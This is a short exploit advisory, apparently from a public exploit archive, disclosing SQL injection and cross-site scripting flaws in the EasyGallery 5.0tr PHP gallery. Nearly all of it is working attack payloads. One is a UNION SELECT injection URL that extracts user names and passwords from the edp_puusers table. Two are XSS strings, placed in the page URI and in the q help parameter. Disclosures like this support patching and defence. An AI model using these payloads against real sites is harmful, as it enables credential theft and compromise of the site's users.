[+] Info: [~] Software: EasyGallery [~] HomePage: http://myiosoft.com [~] Exploit: Multiple Remote Vulnerabilities [High] [~] Bug Found By: Jose Luis Góngora Fernández | JosS [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [~] Verified in localhost with EasyGallery 5.0tr and magic_quotes Off [+] Remote SQL Injection: [~] Vuln File: index.php [~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?page=category&PageSection=0&catid=[SQL] [~] Example: -1+union+all+select+1,2,3,concat(puUsername,char(54),puPassword),5,6,7,8,9,0,1+from+edp_puusers/* [+] Cross Site Scripting in URI: [~] Vuln File: index.php [~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php/[XSS] [~] Example: >"><ScRiPt>alert("JosS)</ScRiPt> [+] Cross Site Scripting: [~] Vuln File: index.php [~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?help=about&q=[XSS] [~] Example: %22+onmouseover=alert("JosS")+
